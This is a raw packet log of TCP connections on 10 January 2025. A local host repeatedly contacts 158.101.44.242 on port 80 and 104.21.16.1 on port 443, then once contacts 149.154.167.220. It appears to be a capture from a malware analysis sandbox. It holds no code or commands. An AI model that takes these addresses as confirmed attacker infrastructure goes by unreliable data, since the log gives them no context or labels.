                                                                                                                          Jan 10, 2025 23:44:12.524317980 CET49732443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:12.527944088 CET4973180192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:12.532826900 CET8049731158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:12.688503027 CET8049731158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:12.691349983 CET49733443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:12.691431999 CET44349733104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:12.691533089 CET49733443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:12.691818953 CET49733443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:12.691840887 CET44349733104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:12.740057945 CET4973180192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:13.153944016 CET44349733104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:13.158582926 CET49733443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:13.158611059 CET44349733104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:13.314260960 CET44349733104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:13.314409018 CET44349733104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:13.314500093 CET49733443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:13.314896107 CET49733443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:13.317883968 CET4973180192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:13.319951057 CET4973480192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:13.322943926 CET8049731158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:13.323026896 CET4973180192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:13.324770927 CET8049734158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:13.324860096 CET4973480192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:13.324970007 CET4973480192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:13.329773903 CET8049734158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:13.918745041 CET8049734158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:13.922652960 CET49735443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:13.922714949 CET44349735104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:13.922910929 CET49735443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:13.923125982 CET49735443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:13.923139095 CET44349735104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:13.974425077 CET4973480192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:14.403554916 CET44349735104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:14.405806065 CET49735443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:14.405839920 CET44349735104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:14.536107063 CET44349735104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:14.536283970 CET44349735104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:14.536358118 CET49735443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:14.536947966 CET49735443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:14.540985107 CET4973480192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:14.542486906 CET4973680192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:14.545895100 CET8049734158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:14.545984983 CET4973480192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:14.547333002 CET8049736158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:14.547435045 CET4973680192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:14.547512054 CET4973680192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:14.552254915 CET8049736158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:15.134408951 CET8049736158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:15.137466908 CET49737443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:15.137512922 CET44349737104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:15.137589931 CET49737443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:15.138150930 CET49737443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:15.138164997 CET44349737104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:15.177541018 CET4973680192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:15.614564896 CET44349737104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:15.621380091 CET49737443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:15.621416092 CET44349737104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:15.771881104 CET44349737104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:15.771979094 CET44349737104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:15.772037983 CET49737443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:15.772397041 CET49737443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:15.776487112 CET4973880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:15.781368017 CET8049738158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:15.782332897 CET4973880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:15.782411098 CET4973880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:15.787178993 CET8049738158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:16.351823092 CET8049738158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:16.355897903 CET49739443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:16.355995893 CET44349739104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:16.356081963 CET49739443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:16.356292963 CET49739443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:16.356328011 CET44349739104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:16.396286964 CET4973880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:16.818773031 CET44349739104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:16.820596933 CET49739443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:16.820653915 CET44349739104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:16.965533972 CET44349739104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:16.965636015 CET44349739104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:16.965714931 CET49739443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:16.966084003 CET49739443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:16.969165087 CET4973880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:16.970088959 CET4974080192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:16.974174023 CET8049738158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:16.974509954 CET4973880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:16.974982023 CET8049740158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:16.975059986 CET4974080192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:16.975142956 CET4974080192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:16.979990959 CET8049740158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:17.535942078 CET8049740158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:17.537470102 CET49742443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:17.537511110 CET44349742104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:17.537583113 CET49742443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:17.537857056 CET49742443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:17.537869930 CET44349742104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:17.583911896 CET4974080192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:18.021277905 CET44349742104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:18.028069973 CET49742443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:18.028110981 CET44349742104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:18.167799950 CET44349742104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:18.167965889 CET44349742104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:18.168028116 CET49742443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:18.175358057 CET49742443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:18.203916073 CET4974080192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:18.209291935 CET8049740158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:18.209379911 CET4974080192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:18.211221933 CET4974380192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:18.216190100 CET8049743158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:18.216274977 CET4974380192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:18.225591898 CET4974380192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:18.230447054 CET8049743158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:18.808058977 CET8049743158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:18.809437990 CET49746443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:18.809533119 CET44349746104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:18.809617996 CET49746443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:18.809890985 CET49746443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:18.809926033 CET44349746104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:18.849414110 CET4974380192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:19.285635948 CET44349746104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:19.296621084 CET49746443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:19.296689987 CET44349746104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:19.419579983 CET44349746104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:19.419646978 CET44349746104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:19.419713974 CET49746443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:19.420320988 CET49746443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:19.424837112 CET4974380192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:19.428260088 CET4974880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:19.429930925 CET8049743158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:19.430022001 CET4974380192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:19.433120012 CET8049748158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:19.433190107 CET4974880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:19.433346033 CET4974880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:19.438205957 CET8049748158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:20.000343084 CET8049748158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:20.001533985 CET49750443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:20.001575947 CET44349750104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:20.001635075 CET49750443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:20.001844883 CET49750443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:20.001853943 CET44349750104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:20.052537918 CET4974880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:20.458208084 CET44349750104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:20.461386919 CET49750443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:20.461402893 CET44349750104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:20.605245113 CET44349750104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:20.605340958 CET44349750104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:20.605397940 CET49750443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:20.606009960 CET49750443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:20.608861923 CET4974880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:20.609623909 CET4975280192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:20.613873959 CET8049748158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:20.613940954 CET4974880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:20.614423990 CET8049752158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:20.614511013 CET4975280192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:20.614590883 CET4975280192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:20.619360924 CET8049752158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:21.237056017 CET8049752158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:21.238229036 CET49753443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:21.238368034 CET44349753104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:21.238435984 CET49753443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:21.238693953 CET49753443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:21.238722086 CET44349753104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:21.286942959 CET4975280192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:21.728106976 CET44349753104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:21.738248110 CET49753443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:21.738280058 CET44349753104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:21.863594055 CET44349753104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:21.863655090 CET44349753104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:21.863709927 CET49753443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:21.864275932 CET49753443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:21.881411076 CET4975280192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:21.886356115 CET8049752158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:21.886420012 CET4975280192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:21.889020920 CET49754443192.168.2.4149.154.167.220
                                                                                                                          Jan 10, 2025 23:44:21.889067888 CET44349754149.154.167.220192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:21.889203072 CET49754443192.168.2.4149.154.167.220
                                                                                                                          Jan 10, 2025 23:44:21.889774084 CET49754443192.168.2.4149.154.167.220
                                                                                                                          Jan 10, 2025 23:44:21.889786959 CET44349754149.154.167.220192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:22.510152102 CET44349754149.154.167.220192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:22.510236025 CET49754443192.168.2.4149.154.167.220
                                                                                                                          Jan 10, 2025 23:44:22.514420986 CET49754443192.168.2.4149.154.167.220
                                                                                                                          Jan 10, 2025 23:44:22.514436960 CET44349754149.154.167.220192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:22.514801979 CET44349754149.154.167.220192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:22.516391993 CET49754443192.168.2.4149.154.167.220
                                                                                                                          Jan 10, 2025 23:44:22.563334942 CET44349754149.154.167.220192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:22.751764059 CET44349754149.154.167.220192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:22.751847982 CET44349754149.154.167.220192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:22.752206087 CET49754443192.168.2.4149.154.167.220
                                                                                                                          Jan 10, 2025 23:44:22.757230997 CET49754443192.168.2.4149.154.167.220
                                                                                                                          Jan 10, 2025 23:44:26.315267086 CET4975580192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:26.320487022 CET8049755158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:26.320600986 CET4975580192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:26.332545042 CET4975580192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:26.337563992 CET8049755158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:26.912889957 CET8049755158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:26.916616917 CET4975580192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:26.921596050 CET8049755158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:27.292238951 CET8049755158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:27.333822966 CET4975580192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:27.364097118 CET49756443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:27.364156008 CET44349756104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:27.364209890 CET49756443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:27.369434118 CET49756443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:27.369467020 CET44349756104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:27.824695110 CET44349756104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:27.824812889 CET49756443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:27.826342106 CET49756443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:27.826355934 CET44349756104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:27.826808929 CET44349756104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:27.880794048 CET49756443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:27.895138025 CET49756443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:27.935338974 CET44349756104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:28.014538050 CET44349756104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:28.014599085 CET44349756104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:28.014673948 CET49756443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:28.020018101 CET49756443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:28.038208008 CET4975580192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:28.043092012 CET8049755158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:28.192877054 CET8049755158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:28.196911097 CET49757443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:28.196966887 CET44349757104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:28.197072029 CET49757443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:28.197350979 CET49757443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:28.197370052 CET44349757104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:28.240063906 CET4975580192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:28.667089939 CET44349757104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:28.669141054 CET49757443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:28.669169903 CET44349757104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:28.800971985 CET44349757104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:28.801059961 CET44349757104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:28.801423073 CET49757443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:28.801757097 CET49757443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:28.805480957 CET4975580192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:28.806817055 CET4975880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:28.810672045 CET8049755158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:28.811594009 CET8049758158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:28.811707973 CET4975580192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:28.811867952 CET4975880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:28.812019110 CET4975880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:28.816884041 CET8049758158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:29.374680996 CET8049758158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:29.376564026 CET49759443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:29.376617908 CET44349759104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:29.376770020 CET49759443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:29.376992941 CET49759443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:29.377008915 CET44349759104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:29.427855015 CET4975880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:29.840090036 CET44349759104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:29.841737032 CET49759443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:29.841761112 CET44349759104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:29.967255116 CET44349759104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:29.967334986 CET44349759104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:29.967395067 CET49759443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:29.967813015 CET49759443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:29.972040892 CET4975880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:29.972887039 CET4976080192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:29.977087975 CET8049758158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:29.977184057 CET4975880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:29.977741003 CET8049760158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:29.977833033 CET4976080192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:29.977925062 CET4976080192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:29.982706070 CET8049760158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:30.545660019 CET8049760158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:30.553968906 CET49761443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:30.554047108 CET44349761104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:30.554131985 CET49761443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:30.554538012 CET49761443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:30.554555893 CET44349761104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:30.599431038 CET4976080192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:31.019331932 CET44349761104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:31.021147966 CET49761443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:31.021179914 CET44349761104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:31.182272911 CET44349761104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:31.182342052 CET44349761104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:31.182461023 CET49761443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:31.182971001 CET49761443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:31.186671019 CET4976080192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:31.188093901 CET4976280192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:31.191685915 CET8049760158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:31.191893101 CET4976080192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:31.192926884 CET8049762158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:31.193099976 CET4976280192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:31.193432093 CET4976280192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:31.198195934 CET8049762158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:31.771938086 CET8049762158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:31.773641109 CET49763443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:31.773753881 CET44349763104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:31.773884058 CET49763443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:31.774169922 CET49763443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:31.774200916 CET44349763104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:31.818322897 CET4976280192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:32.369301081 CET44349763104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:32.371201992 CET49763443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:32.371246099 CET44349763104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:32.498596907 CET44349763104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:32.498677969 CET44349763104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:32.498734951 CET49763443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:32.499206066 CET49763443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:32.503484964 CET4976480192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:32.508383036 CET8049764158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:32.508456945 CET4976480192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:32.508610010 CET4976480192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:32.513521910 CET8049764158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:33.083934069 CET8049764158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:33.085313082 CET49765443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:33.085365057 CET44349765104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:33.085443020 CET49765443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:33.085725069 CET49765443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:33.085741997 CET44349765104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:33.130700111 CET4976480192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:33.542584896 CET44349765104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:33.549705982 CET49765443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:33.549745083 CET44349765104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:33.684423923 CET44349765104.21.16.1192.168.2.4
